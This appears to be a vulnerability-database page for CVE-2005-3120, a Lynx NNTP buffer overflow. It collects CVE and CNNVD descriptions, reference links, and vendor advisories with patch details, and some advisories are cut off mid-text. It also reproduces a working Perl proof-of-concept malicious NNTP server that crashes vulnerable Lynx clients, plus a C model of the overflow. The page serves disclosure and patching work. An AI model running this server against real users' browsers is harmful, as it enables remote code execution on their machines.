CVE-2005-3120
CVSS 7.5
Published: 2005-10-17 16:06:00
Revised: 2010-08-21 00:33:11

[Original] Stack-based buffer overflow in the HTrjis function in Lynx 2.8.6 and earlier allows remote NNTP servers to execute arbitrary code via certain article headers containing Asian characters that cause Lynx to add extra escape (ESC) characters.


[CNNVD] Lynx NNTP Article Header Handling Buffer Overflow Vulnerability (CNNVD-200510-130)

        Lynx is a text-based WWW browser. It does not display images or Java applets, which makes it very fast.
        Lynx has a buffer overflow when it handles certain malformed NNTP article headers. An attacker who exploits it successfully gains full control of EIP, EBX, EBP, ESI and EDI and can execute arbitrary code on the target system. When Lynx connects to an NNTP server to fetch the articles in a newsgroup, it calls HTrjis() with data taken from certain article headers. That function inserts missing ESC characters into the data to support Asian character sets, but it never checks whether it is writing past the end of the character array buffer, so the stack buffer overflows.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no special access conditions are needed to exploit]
Attack vector: [--]
Authentication: NONE [no authentication is needed to exploit]

- CPE (affected platforms and products)

cpe:/a:university_of_kansas:lynx:2.8.3
cpe:/a:university_of_kansas:lynx:2.8.6
cpe:/a:university_of_kansas:lynx:2.8.4
cpe:/a:university_of_kansas:lynx:2.8.6_dev13

- OVAL (technical details for detection)

oval:org.mitre.oval:def:9257 Stack-based buffer overflow in the HTrjis function in Lynx 2.8.6 and earlier allows remote NNTP servers to execute arbitrary code via certai...
*OVAL describes in detail how to detect this vulnerability; the related OVAL definition carries more technical detail on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3120
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-130
(official data source) CNNVD

- Other links and resources

http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html
(VENDOR_ADVISORY)  FULLDISC  20051017 Lynx Remote Buffer Overflow
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=170253
(VENDOR_ADVISORY)  MISC  https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=170253
http://www.redhat.com/support/errata/RHSA-2005-803.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2005:803
http://www.ubuntulinux.org/support/documentation/usn/usn-206-1
(UNKNOWN)  UBUNTU  USN-206-1
http://www.securityfocus.com/bid/15117
(UNKNOWN)  BID  15117
http://www.securityfocus.com/archive/1/archive/1/435689/30/4740/threaded
(UNKNOWN)  BUGTRAQ  20060602 Re: [SECURITY] [DSA 1085-1] New lynx-cur packages fix several vulnerabilities
http://www.securityfocus.com/archive/1/archive/1/419763/100/0/threaded
(UNKNOWN)  FEDORA  FLSA:152832
http://www.openpkg.org/security/OpenPKG-SA-2005.026-lynx.html
(UNKNOWN)  OPENPKG  OpenPKG-SA-2005.026
http://www.novell.com/linux/security/advisories/2005_25_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2005:025
http://www.mandriva.com/security/advisories?name=MDKSA-2005:186
(UNKNOWN)  MANDRIVA  MDKSA-2005:186
http://www.gentoo.org/security/en/glsa/glsa-200510-15.xml
(UNKNOWN)  GENTOO  GLSA-200510-15
http://www.debian.org/security/2006/dsa-1085
(UNKNOWN)  DEBIAN  DSA-1085
http://www.debian.org/security/2005/dsa-876
(UNKNOWN)  DEBIAN  DSA-876
http://www.debian.org/security/2005/dsa-874
(UNKNOWN)  DEBIAN  DSA-874
http://support.avaya.com/elmodocs2/security/ASA-2006-010.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-010.htm
http://slackware.com/security/viewer.php?l=slackware-security&y=2005&m=slackware-security.423056
(UNKNOWN)  SLACKWARE  SSA:2005-310-03
http://securitytracker.com/id?1015065
(UNKNOWN)  SECTRACK  1015065
http://secunia.com/advisories/20383
(UNKNOWN)  SECUNIA  20383
http://secunia.com/advisories/18584
(UNKNOWN)  SECUNIA  18584
http://secunia.com/advisories/18376
(UNKNOWN)  SECUNIA  18376
http://secunia.com/advisories/17480
(UNKNOWN)  SECUNIA  17480
http://secunia.com/advisories/17445
(UNKNOWN)  SECUNIA  17445
http://secunia.com/advisories/17444
(UNKNOWN)  SECUNIA  17444
http://secunia.com/advisories/17360
(UNKNOWN)  SECUNIA  17360
http://secunia.com/advisories/17340
(UNKNOWN)  SECUNIA  17340
http://secunia.com/advisories/17248
(UNKNOWN)  SECUNIA  17248
http://secunia.com/advisories/17238
(UNKNOWN)  SECUNIA  17238
http://secunia.com/advisories/17231
(UNKNOWN)  SECUNIA  17231
http://secunia.com/advisories/17230
(UNKNOWN)  SECUNIA  17230
http://secunia.com/advisories/17216
(UNKNOWN)  SECUNIA  17216
http://secunia.com/advisories/17150
(UNKNOWN)  SECUNIA  17150
http://lists.trustix.org/pipermail/tsl-announce/2005-October/000354.html
(UNKNOWN)  TRUSTIX  TSLSA-2005-0059
ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.47/SCOSA-2005.47.txt
(UNKNOWN)  SCO  SCOSA-2005.47
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.7/SCOSA-2006.7.txt
(UNKNOWN)  SCO  SCOSA-2006.7

- Vulnerability information

Lynx NNTP Article Header Handling Buffer Overflow Vulnerability
High severity  Buffer overflow
2005-10-17 00:00:00 (published)  2005-11-02 00:00:00 (updated)
Remote

- Advisories and patches

        No data

- Vulnerability information (1256)

Lynx <= 2.8.6dev.13 Remote Buffer Overflow Exploit (PoC) (EDBID:1256)
multiple dos
2005-10-17 Verified
0 Ulf Harnhammar
N/A
#!/usr/bin/perl --

# lynx-nntp-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

use strict;
use IO::Socket;

$main::port = 119;
$main::timeout = 5;

# *** SUBROUTINES ***

# Send one line to the client and echo it on the console.
sub mysend($$)
{
    my $file = shift;
    my $str = shift;

    print $file "$str\n";
    print "SENT: $str\n";
} # sub mysend

# Read one line from the client with a timeout; CR, LF and NUL are stripped.
sub myreceive($)
{
    my $file = shift;
    my $inp;

    eval
    {
        local $SIG{ALRM} = sub { die "alarm\n" };
        alarm $main::timeout;
        $inp = <$file>;
        alarm 0;
    };

    if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }
    $inp =~ tr/\015\012\000//d;
    print "RECEIVED: $inp\n";
    $inp;
} # sub myreceive

# *** MAIN PROGRAM ***

{
    my $server = IO::Socket::INET->new( Proto     => 'tcp',
                                        LocalPort => $main::port,
                                        Listen    => SOMAXCONN,
                                        Reuse     => 1);
    die "can't set up server!\n" unless $server;

    while (my $client = $server->accept())
    {
        $client->autoflush(1);
        print 'connection from '.$client->peerhost."\n";

        # Minimal NNTP greeting; Lynx then sends MODE READER, GROUP and HEAD.
        mysend($client, '200 Internet News');
        my $group = 'alt.angst';

        while (my $str = myreceive($client))
        {
            if ($str =~ m/^mode reader$/i)
            {
                mysend($client, '200 Internet News');
                next;
            }

            if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i)
            {
                $group = $1;
                mysend($client, "211 1 1 1 $group");
                next;
            }

            if ($str =~ m/^quit$/i)
            {
                mysend($client, '205 Goodbye');
                last;
            }

            if ($str =~ m/^head ([0-9]+)$/i)
            {
                # Each '$@' (JIS kanji-in) and '(J' (kanji-out) designator makes
                # HTrjis() insert an ESC byte, so the 504-byte Subject grows
                # past the fixed-size buffer it is written into.
                my $evil = '$@UU(JUU' x 21; # Edit the number!
                $evil .= 'U' x (504 - length $evil);

                my $head = <<HERE;
221 $1 <xyzzy\@usenet.qx>
Path: host!someotherhost!onemorehost
From: <mr_talkative\@usenet.qx>
Subject: $evil
Newsgroup: $group
Message-ID: <xyzzy\@usenet.qx>
.
HERE

                $head =~ s|\s+$||s;
                mysend($client, $head);
                next;
            }

            mysend($client, '500 Syntax Error');
        } # while str=myreceive(client)

        close $client;
        print "closed\n\n\n";
    } # while client=server->accept()
}

# milw0rm.com [2005-10-17]
		
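How the ESC insertion described in the CNNVD text and exercised by the Perl server above overruns a fixed buffer, as an added C model that is not Lynx's own code and not part of the EDB entry: rjis_expand() mirrors the behaviour the advisories describe, inserting a missing ESC before each JIS kanji-in designator ("$@" or "$B") and kanji-out designator ("(J" or "(B"), but it takes the destination size and returns the length the complete output needs, snprintf-style, so the caller can detect truncation. rjis_expand_unchecked() is the vulnerable shape with no bound. build_poc_subject() rebuilds the Subject: value the PoC sends so the arithmetic is visible. The 512-byte line buffer, the designator set and every function name here are assumptions for illustration; the real HTrjis() and its buffer size are not reproduced.

```c
#include <stdio.h>
#include <string.h>

#define ESC 0x1b
/* Assumed size of the fixed header line buffer. The advisories only say
 * "the char array buf", so 512 is an illustrative choice, not Lynx's value. */
#define LINE_LENGTH 512

/* ISO-2022-JP designators a bare (ESC-less) JIS header would carry.
 * Kanji-in: "$@" (JIS C 6226-1978) or "$B" (JIS X 0208-1983).
 * Kanji-out: "(J" (JIS-Roman) or "(B" (ASCII). */
static int is_kanji_in(const char *s)  { return s[0] == '$' && (s[1] == '@' || s[1] == 'B'); }
static int is_kanji_out(const char *s) { return s[0] == '(' && (s[1] == 'J' || s[1] == 'B'); }

/* Bounded expansion. Writes at most dstsz-1 bytes plus a NUL into dst and
 * returns the length the complete output needs (snprintf semantics), so a
 * return value >= dstsz tells the caller the line was truncated. */
size_t rjis_expand(const char *src, char *dst, size_t dstsz)
{
    size_t need = 0;
    int kanji = 0;
#define PUT(c) do { if (need + 1 < dstsz) dst[need] = (char)(c); need++; } while (0)

    if (strchr(src, ESC) != NULL) {
        /* Line already carries its escapes: pass it through unchanged. */
        for (const char *p = src; *p; p++) PUT(*p);
    } else {
        for (const char *p = src; *p; ) {
            if (!kanji && is_kanji_in(p)) {          /* "$@" -> ESC '$' '@' */
                kanji = 1; PUT(ESC); PUT(p[0]); PUT(p[1]); p += 2;
            } else if (kanji && is_kanji_out(p)) {   /* "(J" -> ESC '(' 'J' */
                kanji = 0; PUT(ESC); PUT(p[0]); PUT(p[1]); p += 2;
            } else {
                PUT(*p); p++;
            }
        }
    }
#undef PUT
    if (dstsz > 0) dst[need < dstsz ? need : dstsz - 1] = '\0';
    return need;
}

/* The vulnerable shape: same expansion, no knowledge of how big dst is.
 * Every designator adds one byte beyond strlen(src); the PoC's 504-byte line
 * holds 42 of them, so it needs 546 bytes (547 with the terminator) against
 * a LINE_LENGTH-byte buffer. Only call this with a destination you know is
 * large enough. */
size_t rjis_expand_unchecked(const char *src, char *dst)
{
    return rjis_expand(src, dst, (size_t)-1);
}

/* Rebuild the Subject: value the Perl PoC emits: '$@UU(JUU' x repeat,
 * padded with 'U' to 504 bytes. Returns the length written. */
size_t build_poc_subject(char *out, size_t outsz, int repeat)
{
    size_t n = 0;
    for (int i = 0; i < repeat && n + 8 < outsz; i++) {
        memcpy(out + n, "$@UU(JUU", 8);
        n += 8;
    }
    while (n < 504 && n + 1 < outsz)
        out[n++] = 'U';
    out[n] = '\0';
    return n;
}

int main(void)
{
    char subject[600];           /* constructed input, mirrors the PoC */
    char line[LINE_LENGTH];
    size_t in_len = build_poc_subject(subject, sizeof subject, 21);
    size_t need = rjis_expand(subject, line, sizeof line);

    printf("subject bytes in: %zu, bytes after ESC insertion: %zu, buffer: %d\n",
           in_len, need, LINE_LENGTH);
    if (need >= sizeof line)
        printf("an unchecked copy would write %zu bytes past the buffer\n",
               need + 1 - sizeof line);
    return 0;
}
```

The bounded version is the fix pattern: the caller compares the returned length against its buffer and rejects or truncates the header instead of trusting that ESC insertion cannot grow a line by more than a few bytes. Changing the repeat count in build_poc_subject() shows how many designators it takes before the returned length crosses LINE_LENGTH.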

- Vulnerability information (F41407)

SCOSA-2005.47.txt (PacketStormID:F41407)
2005-11-09 00:00:00
SCO  sco.com
advisory,web,overflow,arbitrary,protocol
CVE-2005-3120

SCO Security Advisory - Ulf Harnhammar has reported a vulnerability in Lynx, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in the HTrjis() function in the handling of article headers sent from NNTP (Network News Transfer Protocol) servers. This can be exploited to cause a stack-based buffer overflow by e.g. tricking a user into visiting a malicious web site which redirects to a malicious NNTP server via the nntp: URI handler. Successful exploitation allows execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

 			SCO Security Advisory

Subject:		UnixWare 7.1.3 UnixWare 7.1.4 : Lynx NNTP Buffer Overflow Vulnerability
Advisory number: 	SCOSA-2005.47
Issue date: 		2005 November 08
Cross reference:	fz533159
 			CVE-2005-3120
______________________________________________________________________________


1. Problem Description

 	Ulf Harnhammar has reported a vulnerability in Lynx, which can
 	be exploited by malicious people to compromise a user's system.

 	The vulnerability is caused due to a boundary error in the
 	"HTrjis()" function in the handling of article headers sent from
 	NNTP (Network News Transfer Protocol) servers. This can be
 	exploited to cause a stack-based buffer overflow by e.g.
 	tricking a user into visiting a malicious web site which
 	redirects to a malicious NNTP server via the "nntp:" URI
 	handler.

 	Successful exploitation allows execution of arbitrary code.

 	The Common Vulnerabilities and Exposures project (cve.mitre.org)
 	has assigned the name CVE-2005-3120 to this issue.


2. Vulnerable Supported Versions

 	System				Binaries
 	----------------------------------------------------------------------
 	UnixWare 7.1.3			/usr/gnu/bin/lynx
 	UnixWare 7.1.4			/usr/gnu/bin/lynx


3. Solution

 	The proper solution is to install the latest packages.


4. UnixWare 7.1.3

 	4.1 Location of Fixed Binaries

 	ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.47


 	4.2 Verification

 	MD5 (p533159.image) = bc3fd8c36aea096b7ed75a2f27950b1e

 	md5 is available for download from
 		ftp://ftp.sco.com/pub/security/tools


 	4.3 Installing Fixed Binaries

 	Upgrade the affected binaries with the following sequence:

 	Download p533159.image to the /var/spool/pkg directory

 	# pkgadd -d /var/spool/pkg/p533159.image


5. UnixWare 7.1.4

 	5.1 Location of Fixed Binaries

 	ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.47


 	5.2 Verification

 	MD5 (p533159.image) = bc3fd8c36aea096b7ed75a2f27950b1e

 	md5 is available for download from
 		ftp://ftp.sco.com/pub/security/tools


 	5.3 Installing Fixed Binaries

 	Upgrade the affected binaries with the following sequence:

 	Download p533159.image to the /var/spool/pkg directory

 	# pkgadd -d /var/spool/pkg/p533159.image


6. References

 	Specific references for this advisory:
 		http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120
 		http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html
 		http://securitytracker.com/id?1015065
 		http://secunia.com/advisories/17216

 	SCO security resources:
 		http://www.sco.com/support/security/index.html

 	SCO security advisories via email
 		http://www.sco.com/support/forums/security.html

 	This security fix closes SCO incident fz533159.


7. Disclaimer

 	SCO is not responsible for the misuse of any of the information
 	we provide on this website and/or through our security
 	advisories. Our advisories are a service to our customers
 	intended to promote secure installation and use of SCO
 	products.


8. Acknowledgments

 	SCO would like to thank Ulf Harnhammar for reporting this
 	vulnerability.

______________________________________________________________________________
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (UnixWare)

iD8DBQFDcPYVaqoBO7ipriERAjoRAJ0U1Ik6iVjuCU2XFRAAiJ1k157D8gCeOXw6
+lnmbCl8lvRH/GYwLg2saLE=
=g4hZ
-----END PGP SIGNATURE-----

- Vulnerability information (F41051)

Debian Linux Security Advisory 876-1 (PacketStormID:F41051)
2005-10-30 00:00:00
Debian  security.debian.org
advisory,overflow,arbitrary
linux,debian
CVE-2005-3120

Debian Security Advisory DSA 876-1 - Ulf Harnhammar discovered a buffer overflow in lynx, a text-mode browser for the WWW that can be remotely exploited. During the handling of Asian characters when connecting to an NNTP server lynx can be tricked to write past the boundary of a buffer which can lead to the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 876-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
October 27th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : lynx-ssl
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2005-3120

Ulf H    

- Vulnerability information (F41047)

Debian Linux Security Advisory 874-1 (PacketStormID:F41047)
2005-10-30 00:00:00
Debian  security.debian.org
advisory,overflow,arbitrary
linux,debian
CVE-2005-3120

Debian Security Advisory DSA 874-1 - Ulf Harnhammar discovered a buffer overflow in lynx, a text-mode browser for the WWW that can be remotely exploited. During the handling of Asian characters when connecting to an NNTP server lynx can be tricked to write past the boundary of a buffer which can lead to the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 874-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
October 27th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : lynx
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2005-3120

Ulf H    

- Vulnerability information (F40776)

usn-206-1.txt (PacketStormID:F40776)
2005-10-18 00:00:00
Martin Pitt  security.ubuntu.com
advisory,remote,overflow,arbitrary
linux,ubuntu
CVE-2005-3120

Ubuntu Security Notice USN-206-1 - Ulf Harnhammar discovered a remote vulnerability in Lynx when connecting to a news server (NNTP). The function that added missing escape characters to article headers did not check the size of the target buffer. Specially crafted news entries could trigger a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the user running lynx. In order to exploit this, the user is not even required to actively visit a news site with Lynx since a malicious HTML page could automatically redirect to an nntp:// URL with malicious news items.

===========================================================
Ubuntu Security Notice USN-206-1	   October 17, 2005
lynx vulnerability
CAN-2005-3120
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

lynx

The problem can be corrected by upgrading the affected package to
version 2.8.5-1ubuntu1.1 (for Ubuntu 4.10), 2.8.5-2ubuntu0.5.04 (for
Ubuntu 5.04), or 2.8.5-2ubuntu0.5.10 (for Ubuntu 5.10).  In general, a
standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Ulf Harnhammar discovered a remote vulnerability in Lynx when
connecting to a news server (NNTP). The function that added missing
escape characters to article headers did not check the size of the
target buffer. Specially crafted news entries could trigger a buffer
overflow, which could be exploited to execute arbitrary code with the
privileges of the user running lynx. In order to exploit this, the
user is not even required to actively visit a news site with Lynx
since a malicious HTML page could automatically redirect to an nntp://
URL with malicious news items.


Updated packages for Ubuntu 4.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.diff.gz
      Size/MD5:    17668 c5251ad9cead60e416cf21a461371877
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.dsc
      Size/MD5:      620 4b4310912f7f76fe01cf8312707be244
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
      Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_amd64.deb
      Size/MD5:  1882872 8be361fa3eead1e76cbbf2426c255c8b

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_i386.deb
      Size/MD5:  1833368 d481856973186dd5d432e1102c49a917

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_powerpc.deb
      Size/MD5:  1878484 1496a6331a4666295bd89703e509037a

Updated packages for Ubuntu 5.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.diff.gz
      Size/MD5:    18015 6171994c6c8f67d84267aa69d00ba292
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.dsc
      Size/MD5:      626 08ff9f5a955222f051e4e78101ef7c40
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
      Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_amd64.deb
      Size/MD5:  1881886 74bc70c3731c903e69fd74eb0a6d2d68

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_i386.deb
      Size/MD5:  1832038 f2e333289856566f93f19ca8fd0c5dfd

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_powerpc.deb
      Size/MD5:  1878380 6440d4eae5fadef31aaf21c5396ef401

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.diff.gz
      Size/MD5:    18015 0f7b6e508094dabd59bee9018b368523
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.dsc
      Size/MD5:      626 2a90195b05000a7f318eb04386d1ad1c
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
      Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_amd64.deb
      Size/MD5:  1901120 c2e0da03f20b892aaea81d0f0588f7b1

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_i386.deb
      Size/MD5:  1833214 7c021c0b0667d3aedc8479579d52e5ad

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_powerpc.deb
      Size/MD5:  1881080 5ef72d193817f616e99f01113f6053dd

- Vulnerability information (F40774)

Mandriva Linux Security Advisory 2005.186 (PacketStormID:F40774)
2005-10-18 00:00:00
Mandriva  mandriva.com
advisory,remote,overflow
linux,mandriva
CVE-2005-3120

Mandriva Linux Security Update Advisory - Ulf Harnhammar discovered a remote buffer overflow in lynx versions 2.8.2 through 2.8.5

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

                Mandriva Linux Security Update Advisory
 _______________________________________________________________________

 Package name:           lynx
 Advisory ID:            MDKSA-2005:186
 Date:                   October 17th, 2005

 Affected versions:	 10.1, 10.2, 2006.0, Corporate 3.0,
			 Corporate Server 2.1,
			 Multi Network Firewall 2.0
 ______________________________________________________________________

 Problem Description:

 Ulf Harnhammar discovered a remote buffer overflow in lynx versions
 2.8.2 through 2.8.5.
 
 When Lynx connects to an NNTP server to fetch information about the
 available articles in a newsgroup, it will call a function called
 HTrjis() with the information from certain article headers. The
 function adds missing ESC characters to certain data, to support
 Asian character sets. However, it does not check if it writes outside
 of the char array buf, and that causes a remote stack-based buffer
 overflow, with full control over EIP, EBX, EBP, ESI and EDI.                    
                                                                                 
 Two attack vectors to make a victim visit a URL to a dangerous news
 server are: (a) *redirecting scripts*, where the victim visits some
 web page and it redirects automatically to a malicious URL, and
 (b) *links in web pages*, where the victim visits some web page
 and selects a link on the page to a malicious URL. Attack vector
 (b) is helped by the fact that Lynx does not automatically display
 where links lead to, unlike many graphical web browsers.                 
 
 The updated packages have been patched to address this issue.
 _______________________________________________________________________

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3120
 ______________________________________________________________________

 Updated Packages:
  
 Mandrivalinux 10.1:
 03a47f29118c2291a3bf9a355273560c  10.1/RPMS/lynx-2.8.5-1.1.101mdk.i586.rpm
 0e7e4cd9c64861a7d0a284fb6b9be9e3  10.1/SRPMS/lynx-2.8.5-1.1.101mdk.src.rpm

 Mandrivalinux 10.1/X86_64:
 657c0cd7d9226c5b1f8b57c19e72f657  x86_64/10.1/RPMS/lynx-2.8.5-1.1.101mdk.x86_64.rpm
 0e7e4cd9c64861a7d0a284fb6b9be9e3  x86_64/10.1/SRPMS/lynx-2.8.5-1.1.101mdk.src.rpm

 Mandrivalinux 10.2:
 e81251fccbdd21bdaebd963e6e2ed1d2  10.2/RPMS/lynx-2.8.5-1.1.102mdk.i586.rpm
 6e5cceb1a9bdf36e7f8eab2ecc08799f  10.2/SRPMS/lynx-2.8.5-1.1.102mdk.src.rpm

 Mandrivalinux 10.2/X86_64:
 411f4dc65bf8c58a55a92cdb3be9ef53  x86_64/10.2/RPMS/lynx-2.8.5-1.1.102mdk.x86_64.rpm
 6e5cceb1a9bdf36e7f8eab2ecc08799f  x86_64/10.2/SRPMS/lynx-2.8.5-1.1.102mdk.src.rpm

 Mandrivalinux 2006.0:
 ee92cfae1cce73b8084cf6ad2c6d1381  2006.0/RPMS/lynx-2.8.5-4.1.20060mdk.i586.rpm
 a022a76a884e198cf4f331a4d71c7d20  2006.0/SRPMS/lynx-2.8.5-4.1.20060mdk.src.rpm

 Mandrivalinux 2006.0/X86_64:
 46833e32f2c958d8fb544654efd4ab83  x86_64/2006.0/RPMS/lynx-2.8.5-4.1.20060mdk.x86_64.rpm
 a022a76a884e198cf4f331a4d71c7d20  x86_64/2006.0/SRPMS/lynx-2.8.5-4.1.20060mdk.src.rpm

 Multi Network Firewall 2.0:
 f43a161be8fb6049d3f2361b5ead799a  mnf/2.0/RPMS/lynx-2.8.5-1.1.M20mdk.i586.rpm
 570c3679d4d38e62c21e570ab37f5bfe  mnf/2.0/SRPMS/lynx-2.8.5-1.1.M20mdk.src.rpm

 Corporate Server 2.1:
 b18b5f89f3a8389362a9f67acfb87a2c  corporate/2.1/RPMS/lynx-2.8.5-0.10.2.C21mdk.dev.8.i586.rpm
 3d6af86d010f884152fd30f7fdd0bcb9  corporate/2.1/SRPMS/lynx-2.8.5-0.10.2.C21mdk.dev.8.src.rpm

 Corporate Server 2.1/X86_64:
 d4e5c0107a09cef8d142ca666d049303  x86_64/corporate/2.1/RPMS/lynx-2.8.5-0.10.2.C21mdk.dev.8.x86_64.rpm
 3d6af86d010f884152fd30f7fdd0bcb9  x86_64/corporate/2.1/SRPMS/lynx-2.8.5-0.10.2.C21mdk.dev.8.src.rpm

 Corporate 3.0:
 970bef84ca43e8855569efad58455c47  corporate/3.0/RPMS/lynx-2.8.5-1.1.C30mdk.i586.rpm
 c456757c4be351906911fc7827ffb348  corporate/3.0/SRPMS/lynx-2.8.5-1.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 5df091387574a783a1a9cae4008f7dcb  x86_64/corporate/3.0/RPMS/lynx-2.8.5-1.1.C30mdk.x86_64.rpm
 c456757c4be351906911fc7827ffb348  x86_64/corporate/3.0/SRPMS/lynx-2.8.5-1.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFDVNlzmqjQ0CJFipgRAiK/AKDjzBUwzaHQMJdid4dk85XnzAyFRQCgukjX
uETiVPPn6yJFpJUZwhcA1oo=
=6SF+
-----END PGP SIGNATURE-----

- Vulnerability information (F40771)

Gentoo Linux Security Advisory 200510-15 (PacketStormID:F40771)
2005-10-18 00:00:00
Gentoo  security.gentoo.org
advisory,overflow
linux,gentoo
CVE-2005-3120

Gentoo Linux Security Advisory GLSA 200510-15 - When accessing a NNTP URL, Lynx connects to a NNTP server and retrieves information about the available articles in the target newsgroup. Ulf Harnhammar discovered a buffer overflow in a function that handles the escaping of special characters. Versions less than 2.8.5-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200510-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Lynx: Buffer overflow in NNTP processing
      Date: October 17, 2005
      Bugs: #108451
        ID: 200510-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Lynx contains a buffer overflow that may be exploited to execute
arbitrary code.

Background
==========

Lynx is a text-mode browser for the World Wide Web. It supports
multiple URL types, including HTTP and NNTP URLs.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                      Unaffected
    -------------------------------------------------------------------
  1  www-client/lynx     < 2.8.5-r1                        >= 2.8.5-r1

Description
===========

When accessing a NNTP URL, Lynx connects to a NNTP server and retrieves
